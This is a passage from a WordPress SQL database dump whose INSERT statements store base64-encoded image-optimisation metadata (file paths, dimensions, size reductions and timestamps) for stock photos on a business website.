4MC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU1MywiaWQiOjI1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU1NSwiaWQiOjI1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU1OCwiaWQiOjI1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU2MCwiaWQiOjI1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU2MywiaWQiOjI1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU2NSwiaWQiOjI1NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yMDUwNjI4MC02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU2OCwiaWQiOjI1NX1d'); 
INSERT INTO `wp_postmeta` VALUES (30279, 254, 'wpfc_optimisation_reduction', '198551'); 
INSERT INTO `wp_postmeta` VALUES (30280, 254, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE5MTAxODg1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE5MTAxODg1LmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjIwMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUuanBnIiwicmVkdWN0aW9uIjoxOTg1MzcsInRpbWUiOjE0ODM1ODg1ODIsImlkIjoiMjU0In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1ODUsImlkIjoyNTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE5MTAxODg1LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE5MTAxODg1LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE5MTAxODg1LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NTg4LCJpZCI6MjU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xOTEwMTg4NS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xOTEwMTg4NS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xOTEwMTg4NS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU5MSwiaWQiOjI1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE5MTAxODg1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODU5NiwiaWQiOjI1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg1OTgsImlkIjoyNTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE5MTAxODg1LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE5MTAxODg1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE5MTAxODg1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NjAxLCJpZCI6MjU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xOTEwMTg4NS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xOTEwMTg4NS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xOTEwMTg4NS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODYwMywiaWQiOjI1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2MDYsImlkIjoyNTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2MDksImlkIjoyNTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2MTEsImlkIjoyNTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2MTMsImlkIjoyNTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2MTYsImlkIjoyNTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2MTksImlkIjoyNTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTkxMDE4ODUtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2MjIsImlkIjoyNTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30281, 253, 'wpfc_optimisation_reduction', '123604'); 
INSERT INTO `wp_postmeta` VALUES (30282, 253, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4OTAyMTAwLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4OTAyMTAwLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjIwMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAuanBnIiwicmVkdWN0aW9uIjoxMjM1OTAsInRpbWUiOjE0ODM1ODg2MzMsImlkIjoiMjUzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODg2MzUsImlkIjoyNTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4OTAyMTAwLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4OTAyMTAwLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4OTAyMTAwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4NjM4LCJpZCI6MjUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODkwMjEwMC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODkwMjEwMC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xODkwMjEwMC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODY0MSwiaWQiOjI1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5MDIxMDAtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE4OTAyMTAwLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTg5